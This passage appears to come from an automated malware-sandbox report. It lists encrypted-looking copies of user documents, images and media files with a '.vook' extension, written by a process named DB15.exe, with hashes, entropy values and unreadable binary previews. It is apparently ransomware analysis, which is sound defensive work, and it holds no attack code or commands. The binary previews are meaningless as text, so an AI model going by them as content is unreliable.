                                                                                                                                                                                                                                      Preview:SFPUS.RM...x...C.f.-l.H.....Q.........Ds.<...t....m......oP.A..|N....IH.5s|[.i..... ..O..&....%E.\<.(G...[..3.,..88U..i.Qqx#....4l1.-y.[.`......%.=Ji..`.?...?L|.$"..7.s.J?.t]`.a.+....T...9..y..RY._.I..;......5.,.]j.B0c....2Di....?.BU.o...x..n.O..3...l.o........7.JZ..]..L.-W...=9r......7=.-.VM.GH..>.9.v..h.....n9.!..f..7.Z....|..!...Ry..K.......M....S?..~ .p....H....Z.......'e.e.eQ.HWb=..c.@....k..M.u...oV(.L.rw..^y$4.$...4.DH....1]....2p.H.P.q....z.........L..C...!..b9.....!...s*.5...j..M....m.5*i...T..j..w.h6......d>.d+.:.+..YZ...d.IA.....x....Y..P...4...z...jU...y\....I\.-O...ez......./.woo/@d.-..~.&kiD~.p.YA..Tr....*......#a..../.{JD..Y..W{.Vy;.....Vl.~..g<.....\.A..'.Z..T.z.M..(w.....X.GX'..U.5...!.S`.u.....i>k..U...tC.;...S>..Y.^.........m.B*.4.....Y...,........`...s.^.'.^.BW.W...^...4.$....PpG.A....L...c..B\JO...b.....f.K]...b..Z.u.=:.!R...e..n..<.j..).D%.*W~...(...n...e...9.#.M.N....6<.U...~`=^.P3.!.O.'a.W.B..a..#oG...4E.d.n..[[....C.

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL\SQSJKEBWDT.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8333904998306645
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Zg8dwR84GKp+NkY8pI7hj4CbVKx1gxWka9bacb3CZhdJec6+6wU3iTkbD:NwR84LpWk1pohjacxWbVabhdV6+LiD
                                                                                                                                                                                                                                      MD5:43588039BD6DE2E81987BA82DEF8250F
                                                                                                                                                                                                                                      SHA1:D17930FDB710AF7EC1322A34597A017660EF1E02
                                                                                                                                                                                                                                      SHA-256:5B8DEF1FACA218300268B7DAC68798B884057649F2F69DD782F91B43317F85FB
                                                                                                                                                                                                                                      SHA-512:F2523713D525F6A6B4D121465AC53B8D6E29CED504C3ADA4BDAAC24AEDAA90612D2DFA2D42942E83C96A9130FE0705982701DC06303BF8B32CE2007B55F96448
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQSJK....5w,...'.^...}...lE.`f....:....fS......L.A5.V....U.0.......O.@q...?.7%.{........]a..?CV...=._].._.I...31..0o.G..~.?..P.*....u..i...".._.$-.....C...X....3<... .W.qG..+..7.."..........m..g....Sj..5...h.....4x.S....lA<ac.y..)-..9D_=.4.._<.c..<9..Y....30.wf~A H..Xk..3%j..........DE..u........r.EIYo.&F...R.q.1..........Pszu..tO....n!..I...iq..^....0.~c....v..E.....I......5 ...J....O..\S...U/...... l.\..o c.%..<@..;...Q.8'.....{I.Zz..I!..n.C)......7J..9....@.(C.8..OE..B..u<.W.H... .|M.......B .....[..r./..n.j..i.U..7....x.....7d....u.^..5.p....FKj..~.]._.1.e.x.....Rb?....f.....h..7.K...6...t.......!'...V*.1v.Uevg1q..N..O.$/zO..8.%...=.....{Rha.X..m~..u..g...P.g.....x..Dw.hu..Y.^..J..E.`J..!.U...8..E....k......m.b3.... .......q...L..x...G....}P.......ym.V.4..1..H...6S..7..........J......9...H...3...b...YUq>U.@.GB.ql .M....f4.8T.q.B"Q..=...%tv...b.s(.Bb..TY.x.6.#.#..y.x......Y.%./..f}^..9M...t.4..Z.F...c..v..k....q...M.N...H.....d{.P.F=.v

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL\SQSJKEBWDT.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8333904998306645
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Zg8dwR84GKp+NkY8pI7hj4CbVKx1gxWka9bacb3CZhdJec6+6wU3iTkbD:NwR84LpWk1pohjacxWbVabhdV6+LiD
                                                                                                                                                                                                                                      MD5:43588039BD6DE2E81987BA82DEF8250F
                                                                                                                                                                                                                                      SHA1:D17930FDB710AF7EC1322A34597A017660EF1E02
                                                                                                                                                                                                                                      SHA-256:5B8DEF1FACA218300268B7DAC68798B884057649F2F69DD782F91B43317F85FB
                                                                                                                                                                                                                                      SHA-512:F2523713D525F6A6B4D121465AC53B8D6E29CED504C3ADA4BDAAC24AEDAA90612D2DFA2D42942E83C96A9130FE0705982701DC06303BF8B32CE2007B55F96448
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQSJK....5w,...'.^...}...lE.`f....:....fS......L.A5.V....U.0.......O.@q...?.7%.{........]a..?CV...=._].._.I...31..0o.G..~.?..P.*....u..i...".._.$-.....C...X....3<... .W.qG..+..7.."..........m..g....Sj..5...h.....4x.S....lA<ac.y..)-..9D_=.4.._<.c..<9..Y....30.wf~A H..Xk..3%j..........DE..u........r.EIYo.&F...R.q.1..........Pszu..tO....n!..I...iq..^....0.~c....v..E.....I......5 ...J....O..\S...U/...... l.\..o c.%..<@..;...Q.8'.....{I.Zz..I!..n.C)......7J..9....@.(C.8..OE..B..u<.W.H... .|M.......B .....[..r./..n.j..i.U..7....x.....7d....u.^..5.p....FKj..~.]._.1.e.x.....Rb?....f.....h..7.K...6...t.......!'...V*.1v.Uevg1q..N..O.$/zO..8.%...=.....{Rha.X..m~..u..g...P.g.....x..Dw.hu..Y.^..J..E.`J..!.U...8..E....k......m.b3.... .......q...L..x...G....}P.......ym.V.4..1..H...6S..7..........J......9...H...3...b...YUq>U.@.GB.ql .M....f4.8T.q.B"Q..=...%tv...b.s(.Bb..TY.x.6.#.#..y.x......Y.%./..f}^..9M...t.4..Z.F...c..v..k....q...M.N...H.....d{.P.F=.v

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL\ZQIXMVQGAH.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.855797185941888
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:QZKd+0CViAT8p1s1rEsYZxJxoqwOHnDH5/hBUiTkbD:Qo+0XA0GVYzRwOHDHHBNiD
                                                                                                                                                                                                                                      MD5:224E785A8A2CBC1642469D9FA60EA68E
                                                                                                                                                                                                                                      SHA1:07564EE1EECE0D9FF57E4D17867F80C2294F9E0E
                                                                                                                                                                                                                                      SHA-256:09477AFE87243591733862D589B5E6FE6D2E8D1D1F7FBC5B759F82CF90ED0C91
                                                                                                                                                                                                                                      SHA-512:FFF46AC0F30E6930729ED1A4D6398F40D3905C588B4F37F1411466D0F1167F315B8541C70B89982565615E60995D6FFD5206FC934C0711C2E10C28A8DE844468
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM.. b..A.Sc.V*8..).....~...u...c} .x.R...h..z.E.r$6..e.V{.9.....m..=.x^.../........J..[Jd.6.[..Y........^),..Ob#...7...'......=J..a.I.Kx./!..w[......a.....X..Z9U.Z[.#....g..l..o....T.....G..`cf.].X...?...9.g.N.<-.A....1V...VW.........(...i.ot^...n....5...9K.z...mqENZ.E.....U. M.QJu!!I..kN..........L.F....1.K..3>,.{~.q..Ffg. .I....i+..m{9..u.....@'.....\....ay.&&.V..&Q..'.|..6../.'s.6..\.q.U.5h.o|...G...w%.,RS..v....f...%$....].......f$..........q69P..7....n4..Q....0...O.+.....^{....f.Y[#W.'-j?..Ie!...?.:0a.^.@.x.7."......b..:..<Nv0.a....a..E...X..&....D..Y'.....$h.\Sk>ned.:Q....t.Ws..s.....n.."...x..o.!P...A.3...=....bk......6...:.L......&/.9.[$(i..."....}I.....EZ>.jVE .Wn ?....[....i....k.A....R..h..9^. .Zp..#.v|.i.i}.l.A.03q.a..~...9....%....G8....~..........:|..'.1.A.a.uC..dl.k..+.[z. ;.]Fk.^.L.4.m.m.>........`=.aa...=.H.n.L-?...I..E..C-...wL..^...m...f{..'.JjPA...O^.Z......ZL.e4...l..u..S.....q....i..H..r.\JZ...l..O

                                                                                                                                                                                                                                      C:\Users\user\Documents\SFPUSAFIOL\ZQIXMVQGAH.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.855797185941888
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:QZKd+0CViAT8p1s1rEsYZxJxoqwOHnDH5/hBUiTkbD:Qo+0XA0GVYzRwOHDHHBNiD
                                                                                                                                                                                                                                      MD5:224E785A8A2CBC1642469D9FA60EA68E
                                                                                                                                                                                                                                      SHA1:07564EE1EECE0D9FF57E4D17867F80C2294F9E0E
                                                                                                                                                                                                                                      SHA-256:09477AFE87243591733862D589B5E6FE6D2E8D1D1F7FBC5B759F82CF90ED0C91
                                                                                                                                                                                                                                      SHA-512:FFF46AC0F30E6930729ED1A4D6398F40D3905C588B4F37F1411466D0F1167F315B8541C70B89982565615E60995D6FFD5206FC934C0711C2E10C28A8DE844468
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM.. b..A.Sc.V*8..).....~...u...c} .x.R...h..z.E.r$6..e.V{.9.....m..=.x^.../........J..[Jd.6.[..Y........^),..Ob#...7...'......=J..a.I.Kx./!..w[......a.....X..Z9U.Z[.#....g..l..o....T.....G..`cf.].X...?...9.g.N.<-.A....1V...VW.........(...i.ot^...n....5...9K.z...mqENZ.E.....U. M.QJu!!I..kN..........L.F....1.K..3>,.{~.q..Ffg. .I....i+..m{9..u.....@'.....\....ay.&&.V..&Q..'.|..6../.'s.6..\.q.U.5h.o|...G...w%.,RS..v....f...%$....].......f$..........q69P..7....n4..Q....0...O.+.....^{....f.Y[#W.'-j?..Ie!...?.:0a.^.@.x.7."......b..:..<Nv0.a....a..E...X..&....D..Y'.....$h.\Sk>ned.:Q....t.Ws..s.....n.."...x..o.!P...A.3...=....bk......6...:.L......&/.9.[$(i..."....}I.....EZ>.jVE .Wn ?....[....i....k.A....R..h..9^. .Zp..#.v|.i.i}.l.A.03q.a..~...9....%....G8....~..........:|..'.1.A.a.uC..dl.k..+.[z. ;.]Fk.^.L.4.m.m.>........`=.aa...=.H.n.L-?...I..E..C-...wL..^...m...f{..'.JjPA...O^.Z......ZL.e4...l..u..S.....q....i..H..r.\JZ...l..O

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.831777547163186
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:JLROsGav6+lPmgrCoaf8vF3kMGy7QpyaX1GAwiYfhjGiTkbD:9bGay+XrCoDvF3jGy75SGFZjiD
                                                                                                                                                                                                                                      MD5:7778F044B30827A6607FAD36C6C650CA
                                                                                                                                                                                                                                      SHA1:DC7E52AA80585BF0ACABDCC8FA4045D738DE7067
                                                                                                                                                                                                                                      SHA-256:763388E01F913B61D3F10AD8DFE7425B45867023D4BF09E085318CB9C3B7AE36
                                                                                                                                                                                                                                      SHA-512:F1C74BA600A8BCE023D35E9485D24C07B9B9E5C5E426E3C612881A2DE00DAD5CC7FD5232561D0B1F819E64F8C4AB255778D87B458460C4A420C87D5B896D4C83
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQRKH,..g^m7+....f..9.b.}.K,tSp.vR.....9}..........=.>....f.d~.~.7...G.....<Rt...j..F..[..K..F....^h.8X.F.qS".Gg@...y.[..E..q...W....GBY.K...[Y...'4.AT./w-......^*...|.x...\HT|p...x...6"....o.e....q..@...........I..I.....)......./;T.......(....}I.........f<:.@..8G....i1A...9...D.?..fT-Xg.D..9..1$G....$r...... .....{...mw5...z..thY..w.........A........k.......'.w.....i..N|O...>.).4.Nq .*.r.vD..Nf3.....bK...O..uV.tG.A...5f....MGt.`,jJ..G`...|En....#..N.C."....@.<...2x.L.^..w .Y."S...l.........3d....&.......Dv_.(.u.Y..M.H..$dn.....14u5.3/.S.......p....?uTP...].:.1"7.h...3`(...)fa...u.....Y..3....R.U..[..D....&.{.Ye.V.G.....x!..B.uj.{..A..(..w..Ve..g.6]..-.).....=..g.9"fa.....>._.o.:...|..].Z\E....7.L..u..M..%%k..zVxg. O{..o.{~.@9..f,...f..&.O..v..1..O....OcaB...O.!..5.3."...$q..}.. .dZ...q........v{...q'...\T5BM..'l...;/Y.9u1I..%4.g4..RN...).Z..2W$...........C..9.[..*(..S.....R.Y.D.N.f.y.Qe.vx?.$..=Y.-x..L."MCg.G....=W..G9..^....SD

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.831777547163186
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:JLROsGav6+lPmgrCoaf8vF3kMGy7QpyaX1GAwiYfhjGiTkbD:9bGay+XrCoDvF3jGy75SGFZjiD
                                                                                                                                                                                                                                      MD5:7778F044B30827A6607FAD36C6C650CA
                                                                                                                                                                                                                                      SHA1:DC7E52AA80585BF0ACABDCC8FA4045D738DE7067
                                                                                                                                                                                                                                      SHA-256:763388E01F913B61D3F10AD8DFE7425B45867023D4BF09E085318CB9C3B7AE36
                                                                                                                                                                                                                                      SHA-512:F1C74BA600A8BCE023D35E9485D24C07B9B9E5C5E426E3C612881A2DE00DAD5CC7FD5232561D0B1F819E64F8C4AB255778D87B458460C4A420C87D5B896D4C83
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQRKH,..g^m7+....f..9.b.}.K,tSp.vR.....9}..........=.>....f.d~.~.7...G.....<Rt...j..F..[..K..F....^h.8X.F.qS".Gg@...y.[..E..q...W....GBY.K...[Y...'4.AT./w-......^*...|.x...\HT|p...x...6"....o.e....q..@...........I..I.....)......./;T.......(....}I.........f<:.@..8G....i1A...9...D.?..fT-Xg.D..9..1$G....$r...... .....{...mw5...z..thY..w.........A........k.......'.w.....i..N|O...>.).4.Nq .*.r.vD..Nf3.....bK...O..uV.tG.A...5f....MGt.`,jJ..G`...|En....#..N.C."....@.<...2x.L.^..w .Y."S...l.........3d....&.......Dv_.(.u.Y..M.H..$dn.....14u5.3/.S.......p....?uTP...].:.1"7.h...3`(...)fa...u.....Y..3....R.U..[..D....&.{.Ye.V.G.....x!..B.uj.{..A..(..w..Ve..g.6]..-.).....=..g.9"fa.....>._.o.:...|..].Z\E....7.L..u..M..%%k..zVxg. O{..o.{~.@9..f,...f..&.O..v..1..O....OcaB...O.!..5.3."...$q..}.. .dZ...q........v{...q'...\T5BM..'l...;/Y.9u1I..%4.g4..RN...).Z..2W$...........C..9.[..*(..S.....R.Y.D.N.f.y.Qe.vx?.$..=Y.-x..L."MCg.G....=W..G9..^....SD

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN\IPKGELNTQY.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.855268578347413
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:bgL0CR+itJzDpkEXOd6Hi56D0HOdLUAyw3R2N6W6UPETDGWiTkbD:bdCR+itLbOi2osOJUAl3o+UPETSTiD
                                                                                                                                                                                                                                      MD5:B07D7E7B5C33120BBCE9F6EC27409B20
                                                                                                                                                                                                                                      SHA1:8217058ECE99F34FE9AEE21CE69CACE63585B573
                                                                                                                                                                                                                                      SHA-256:D9591BF2C6C6A94599E856989A715D49A37B98C319263A1F5895687504C81E6E
                                                                                                                                                                                                                                      SHA-512:30513D97B709FD4B8EC5A77C9F32298A95037EF3197F050FC9BB9FB6ADC250AFC2D8469063610235E8A9E660AA88F4784D947730ED739A8EB30257913DC2AEA5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:IPKGE....j.2.....L.(.$..7l.N :..).Q.>p...T.Ete$!<..P.h.%V..[Ji&De....KZ4.........R.L].....b...,.V.:d.2....x...5E...@B.yd.%.F.....:...O._.....#H...O.RL.....7....R<.M.V..`..*|.'U...&p~k.y.+u..j..\...nH..^.Q ..r...*...$6r`~!..:.7.e{..DC..O.{..j..t eQ......nD..:W.`.........lw.+>.......,.-.c..,... .-...-.....0..Tm.8.0..N.0..H...|..XfA....Mv|....y.Z...6^..rS[.6`%.V..~Q....i.Vm.Pj.F^../.;........$7.>r.`.*).....`..1.q-B...#...q...L...I...;.B.{g.C.g:K....v5.o8.....7*o7.{b..ur...ob.@.l.......f..Z.`^....??3..F.}....g...Z'![)........r@Q.......-.p.V......o..O.wL._..,...L^..}&.....-......-.Q!..b.'.O.]l.....vX|.i...{....c...eS.S..w.."...X.u.....#YK. ......a4.l..+1{...^g...&..t...0..h....A...J~..../y...gm.co......<...1tW..4.'+.E...7..b.E..8.......j..U.#..ah..N....V...0..b.6./>6i..k...iO.OO.....\..n>.r.A.1X. ...[.T?W.\.>8.......m.6.X1......U.~9Y..R>.c.....KA..|0...Z.x.J..}wo<.4..\.Y(.#....q...........&.@....+...a.....g.,.I..G........P..e....';+..^D.h...F..

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN\IPKGELNTQY.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.855268578347413
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:bgL0CR+itJzDpkEXOd6Hi56D0HOdLUAyw3R2N6W6UPETDGWiTkbD:bdCR+itLbOi2osOJUAl3o+UPETSTiD
                                                                                                                                                                                                                                      MD5:B07D7E7B5C33120BBCE9F6EC27409B20
                                                                                                                                                                                                                                      SHA1:8217058ECE99F34FE9AEE21CE69CACE63585B573
                                                                                                                                                                                                                                      SHA-256:D9591BF2C6C6A94599E856989A715D49A37B98C319263A1F5895687504C81E6E
                                                                                                                                                                                                                                      SHA-512:30513D97B709FD4B8EC5A77C9F32298A95037EF3197F050FC9BB9FB6ADC250AFC2D8469063610235E8A9E660AA88F4784D947730ED739A8EB30257913DC2AEA5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:IPKGE....j.2.....L.(.$..7l.N :..).Q.>p...T.Ete$!<..P.h.%V..[Ji&De....KZ4.........R.L].....b...,.V.:d.2....x...5E...@B.yd.%.F.....:...O._.....#H...O.RL.....7....R<.M.V..`..*|.'U...&p~k.y.+u..j..\...nH..^.Q ..r...*...$6r`~!..:.7.e{..DC..O.{..j..t eQ......nD..:W.`.........lw.+>.......,.-.c..,... .-...-.....0..Tm.8.0..N.0..H...|..XfA....Mv|....y.Z...6^..rS[.6`%.V..~Q....i.Vm.Pj.F^../.;........$7.>r.`.*).....`..1.q-B...#...q...L...I...;.B.{g.C.g:K....v5.o8.....7*o7.{b..ur...ob.@.l.......f..Z.`^....??3..F.}....g...Z'![)........r@Q.......-.p.V......o..O.wL._..,...L^..}&.....-......-.Q!..b.'.O.]l.....vX|.i...{....c...eS.S..w.."...X.u.....#YK. ......a4.l..+1{...^g...&..t...0..h....A...J~..../y...gm.co......<...1tW..4.'+.E...7..b.E..8.......j..U.#..ah..N....V...0..b.6./>6i..k...iO.OO.....\..n>.r.A.1X. ...[.T?W.\.>8.......m.6.X1......U.~9Y..R>.c.....KA..|0...Z.x.J..}wo<.4..\.Y(.#....q...........&.@....+...a.....g.,.I..G........P..e....';+..^D.h...F..

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN\MXPXCVPDVN.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.831822214263987
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:+08nv0il3E8dRYkh1iRBoTi5MOoBqJefsYtcGn+FCb6ZtL1JsfaWUdZzvVTiTkbD:eZl3EYRzEBompZekYtEFJZdAzUdZMiD
                                                                                                                                                                                                                                      MD5:84A1FD8C02F6162730DABC8FEB8FCA71
                                                                                                                                                                                                                                      SHA1:7DDDA4893483E29A7D6058DC27D44E1CB7969B42
                                                                                                                                                                                                                                      SHA-256:A8B0579790D4E80DB6E3CD1A35B4E8F0CB4679AD3FCCACC0FDCC91CE9AF60D9F
                                                                                                                                                                                                                                      SHA-512:B6F22298A829279532F3C6656D700B4C9AFC5A03E6FA22D1E92FB997D27AF691361D1C5D3399CF0918266CDD29CD3C08B8378798CA1949C97B73B12769CCFF81
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXClD.}.R}.xQ..D.{..m../.....W;>n..pS.2P................e..}....".N.R...B..{....ahV..w.7y..2...d...x..oZ|..L..3.....j......4.}..*;....`........@..rx...Vze.......y.._J,.!Wzfis..j........~$.J.9.....y.Q..@....^...dH`.].....K.@p...w......Wy.&.................C).VrT...5......v.^.&...o@r..*T...;..L:F..!F4<..e\^.my..l.....575*..2H...0..c.X...].t......../..6......'..J(*i'%U....Dg.W.\.........i..WP."[.a..J..BJ.8.......y+2.pV..[;3.......Tbn.yr.Y."u.2).DA....]......L..v&q...$..;.S.N..4[w..;qTU...Xg....&......(...2...~...c..._.F....=..>+...q.]C....oT...7Z.$}.G......Xa8.OU..g...$y{..g...J..E.g....@`...FC.9..u..~tV....g..U..fC24...^....D.."........6I...,..<i.0.G......1.vr.:.N..h..z....e..@V.dW..[;R'Z..$.0..^.2...}.}.&..X.3.....)sz..;....?...r.G..W.).>U....Y...g.Q...72..X.(2.Qx.d.....}{..HEji$Lm;Q....{.....J..]...e..._;.n..[....]P....Y.....$iXb... .../N.m.-{...'.......D.1Fe.yG..f.....6\.kCD.~i=!%Q".I..8.....B......t.:.......BZ...;..e..mH.k....B

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN\MXPXCVPDVN.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.831822214263987
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:+08nv0il3E8dRYkh1iRBoTi5MOoBqJefsYtcGn+FCb6ZtL1JsfaWUdZzvVTiTkbD:eZl3EYRzEBompZekYtEFJZdAzUdZMiD
                                                                                                                                                                                                                                      MD5:84A1FD8C02F6162730DABC8FEB8FCA71
                                                                                                                                                                                                                                      SHA1:7DDDA4893483E29A7D6058DC27D44E1CB7969B42
                                                                                                                                                                                                                                      SHA-256:A8B0579790D4E80DB6E3CD1A35B4E8F0CB4679AD3FCCACC0FDCC91CE9AF60D9F
                                                                                                                                                                                                                                      SHA-512:B6F22298A829279532F3C6656D700B4C9AFC5A03E6FA22D1E92FB997D27AF691361D1C5D3399CF0918266CDD29CD3C08B8378798CA1949C97B73B12769CCFF81
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXClD.}.R}.xQ..D.{..m../.....W;>n..pS.2P................e..}....".N.R...B..{....ahV..w.7y..2...d...x..oZ|..L..3.....j......4.}..*;....`........@..rx...Vze.......y.._J,.!Wzfis..j........~$.J.9.....y.Q..@....^...dH`.].....K.@p...w......Wy.&.................C).VrT...5......v.^.&...o@r..*T...;..L:F..!F4<..e\^.my..l.....575*..2H...0..c.X...].t......../..6......'..J(*i'%U....Dg.W.\.........i..WP."[.a..J..BJ.8.......y+2.pV..[;3.......Tbn.yr.Y."u.2).DA....]......L..v&q...$..;.S.N..4[w..;qTU...Xg....&......(...2...~...c..._.F....=..>+...q.]C....oT...7Z.$}.G......Xa8.OU..g...$y{..g...J..E.g....@`...FC.9..u..~tV....g..U..fC24...^....D.."........6I...,..<i.0.G......1.vr.:.N..h..z....e..@V.dW..[;R'Z..$.0..^.2...}.}.&..X.3.....)sz..;....?...r.G..W.).>U....Y...g.Q...72..X.(2.Qx.d.....}{..HEji$Lm;Q....{.....J..]...e..._;.n..[....]P....Y.....$iXb... .../N.m.-{...'.......D.1Fe.yG..f.....6\.kCD.~i=!%Q".I..8.....B......t.:.......BZ...;..e..mH.k....B

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN\NEBFQQYWPS.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.847880947060739
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:CqzROMcybb/0XfOIz1QQ8YWz4Au/m/HOEld8JOza/mh8+nPZNDYcjnrnQjRL9xJk:CqzROp8CrhQ/Fumvld8QzLhBN0cfnQZi
                                                                                                                                                                                                                                      MD5:186947416B18C7451DFEF9C0C465C358
                                                                                                                                                                                                                                      SHA1:6B0B5C4BD7899DF24898AAA936193F071C234FCC
                                                                                                                                                                                                                                      SHA-256:13BC09569A95DCD61063ED0A69AA06283552239321A01632D9DE9CD25CE49F3D
                                                                                                                                                                                                                                      SHA-512:07A8604230586988A9D041F3C352C3C8C3D15C1AC6AC1E71A46FA33DCD35932F4563781DBD356ED3351A0A31F5EA091AECA94B2B1A591897F86E16325391D0CB
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ...(..N. .8..h}..%I.^..B`.....Y..d.5'.7(-......l.........n..}{.!2L.2qw..J........P>...Z.....>..9.1...j52.OI8.^.)..K16MH.0^.Q..<0.(.~...U..;......>..Z.6!.vL...9=..!.....*....xgd|.bi....T.t..$....5.a.`eyF..M&.......i~`vQ...c.W....[..r..v.APr....l...(.*...U*XK...EL..cB+....O8.p....{3....xv`.s.....7.r.&...l.+..^..X......../.B.)_y@.$R...%.......\c...c.}.j~pd........#.H..w..p^.l'-S(.<...U)g.....O...D4,N..^..3.Ny...+.O(XeG.....M.y...*..].......3ue......."...8.%c.(.....k0.....]h......A...E:mnm...Rg..(/...O.....[>.F..6.R_.F.33..L.K. &Xz.p.q..H...{9......"..5...7j.@..t.1^)V..P...?..7^..a........|..z$.~...6.hp....O...~-...........e..ag.n.....1.F.S...`.K.W......o...o..-...J..@s..2.....qq..<........P......I.EY.....^....)..:.YLH.N.N....W..n@.l...].gU..}...`.k.."..Y.z....;..47..E...].f....?4..~@..".x..].n.>..8k*......`C.i.....e.K*....i.g...Pz...Z...!...q.........X`...-...9..D'&..5.e\n.......|...:...?gfO.9X].Y....Q....#..Z.>._..T...#.

                                                                                                                                                                                                                                      C:\Users\user\Documents\SQRKHNBNYN\NEBFQQYWPS.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.847880947060739
